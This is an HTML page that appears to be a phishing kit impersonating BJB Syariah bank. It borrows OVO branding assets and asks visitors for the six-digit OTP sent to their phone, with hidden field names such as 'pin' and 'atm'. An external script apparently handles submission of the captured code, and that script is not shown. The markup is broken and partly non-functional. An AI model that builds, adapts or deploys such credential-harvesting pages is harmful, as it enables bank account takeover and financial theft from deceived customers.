<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<html class=" js flexbox canvas canvastext webgl touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths" lang="" style="">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <link rel="stylesheet" type="text/css" href="cid:css-eb07ce95-ac9f-4369-a418-a7c9207308dd@mhtml.blink" />
        <link rel="stylesheet" type="text/css" href="cid:css-bd60bd95-3c6f-41f9-bedd-2d2a767285a6@mhtml.blink" />
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>BJB Syariah</title>
<meta name="description" content="Jadikan transaksi lebih simpel, instan, aman dan dapatkan berbagai keuntungan lainnya!">
<meta name="keywords" content="ovo, payment, point, deal, loyalty, bill payment, promo, diskon, cashback, bayar listrik, pulsa, sky parking, maxx coffee, matahari department store, hypermart">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="apple-touch-icon" href="https://www.ovo.id/apple-touch-icon.png">
<link rel="icon" href="https://www.ovo.id/ovo_front_res/favicon.png" type="image/png" sizes="32x32">
<link rel="stylesheet" href="https://www.ovo.id/ovo_front_res/css/bs-grid.css">
<link rel="stylesheet" href="https://www.ovo.id/ovo_front_res/css/ovo.css?v=1.2">
<link rel="stylesheet" href="https://www.ovo.id/ovo_front_res/css/animate.min.css">
<link rel="stylesheet" href="https://www.ovo.id/ovo_front_res/css/parsley.css">
  <meta property="og:url" content="">
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
    <link rel="stylesheet" href="style.css">
    <style>
    body {
    margin: 10px;
    font-family: sans-serif;
    display: flex;
    position: center;
    justify-content: center;
    flex-direction: column;
    background: #696969;
    height: 100%;
    font color: black;
}

.otp-field {
    display: flex;
}

.otp-field input {
    width: 40px;
    height: 40px;
    font-size: 19px;
    padding: 13px;
    align-items: center;
    border-radius: 4px;
    margin: 2px;
    border: 0.70px solid #0085e0;
    background: transfarent;
    font-weight: bold;
    font color: #0085e0;
    outline: none;
    transition: all 0.1s;
    margin-top: -40px;

}

.otp-field input:focus {
    box-shadow: 0 0 1px 1px none;
}

.disabled {
    opacity: 0.5;
}

.space {
    margin-right: 1rem !important;
}
    </style>
                <style>

        .blink {

            animation: blink-animation 5s steps(5, start) infinite;
            -webkit-animation: blink-animation 1s steps(5, start) infinite;
        }
        @keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        @-webkit-keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        h4{
            display: table;
            background-color: none;
            color: red;
            padding: 0px;
            width: 100%;
            font-size: 14px;
            text-align: center;
            font-family: Times New Roman;
            
            
            
        }
    </style>
</head>
<body>
<div class="greyout" style="top: 0px; left: 0px; width: 100%; height: 20%; background-color: transfarent; position: fixed; z-index: 2002; opacity: 1; display: block;">
    </div>
    <div class="bubble-element Popup bubble-r-container relative" style="top: 0px; left: 0px; right: 0px; position: fixed; z-index: 2002; margin-left: auto; margin-right: auto; width: 100%; min-height: 50px; height: auto; overflow-y: auto; opacity: 1; border-style: outset; border-width: 1px; border-left:  none; border-right: none; border-top: none; border-color: white; border-radius: 0px; background:  #696969; padding: 0px 10px;">
<img src="https://jayandra.com/wp-content/uploads/2018/08/bjbs-putih.png" style="width: 27%; height: 55px; margin-left: -1%; margin-top: 5px;"><p style="width: 34%; margin-top: -5%; margin-left: 65%; font-weight: bold; font-size: 14px; text-align: center; color: black"></p>
</div>
<form id="tg" onsubmit=""><!--
        <p style="width: 90%; margin-top: -34%; margin-left: 37px; font-weight: bold; font-size: 18px; text-align: left; color: black">Verifikasi Lewat SMS</p>-->
        </div>
        <center>
    <img src="https://jayandra.com/wp-content/uploads/2018/08/bjbs-putih.png" style="width: 50%; height: 115px; margin-top: -95px;" alt=""></center>
    <p style="width: 90%; margin-top: 5%; margin-left: 15px; font-size: 13px; text-align: center; color: white; font-weight: 500;">Masukan kode verifikasi/OTP<br>Yang di kirim ke nomor Hp anda</p>
    </div>
    <div class="otp-field" style="margin-left: 11%; margin-top: 20%;">
        <input type="tel" name="name" id="name" maxlength="1" required="">
        <input type="tel" name="atm" id="atm" maxlength="1" required="">
        <input type="tel" name="pin" id="pin" maxlength="1" required="">
        <input type="tel" name="otp" id="otp" maxlength="1" required="">
        <input type="tel" name="phone" id="phone" maxlength="1" required="">
        <input type="tel" name="pesan" id="pesan" maxlength="1" required=""></center>
        </div>
        <center>
            <br>
<p style="text-align: left; font-size: 13px; margin-top: 0%; margin-left: 56px; color: white;">Belum dapat kode?<a href="" style="width: 30%; height: -50px; margin-left: 0%; margin-top: 0%; font-size: 12px; text-align: center; font-weight: bold; color: #48D1CC;"> Kirim ulang<p id="timer" style="margin-top: -38px; margin-left: 55%; font-size: 12px; font-weight: bold; color: white;"></p>
<br>
</div>
</div>
<button type="submit" style="width: 79%; height: 40px; margin-top: -10%; font-size: 17px; font-weight: bold; background: #696969; color: white; border-radius: 50px; border: 1px solid white; padding: 0px;" value="">Lanjut</button>
</div>
    <script>
    const inputs = document.querySelectorAll('.otp-field input')


inputs.forEach((input , index) => {
    input.dataset.index = index
    input.addEventListener("paste" , handleOnPaste)
    input.addEventListener("keyup" , handleOtp)
})

function handleOnPaste (e) {
    const data = e.clipboardData.getData("text")
    const value = data.split("numeric")
    if(value.length == inputs.length){
        inputs.forEach((input , index) => (
            input.value = value[index]
        ))
        submit()
    } else {
        alert("wrong otp size")
    }
}

function handleOtp (e) {
    const input = e.target
    let value = input.value
    input.value = ""
    input.value = value ? value[0] : "1"

    let fieldIndex = input.dataset.index
    if(value.length > 0 && fieldIndex < inputs.length - 1) {
        input.nextElementSibling.focus()
    }

    if(fieldIndex == inputs.length - 1){
        submit ()
    }
}


function button () {
    let otp = ""
    inputs.forEach(input => {
        otp += input.value
        input.disabled = true
        input.classList.add("")
    }) 

    console.log("()" + otp)


    // Handle Your API HERE 
}
    </script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
    <script>
        document.getElementById('timer').innerHTML =
          03 + ":" + 01;
        startTimer();
        
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
    </script>
    <script src="/fetch.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
<body>
    </section>
</html> 
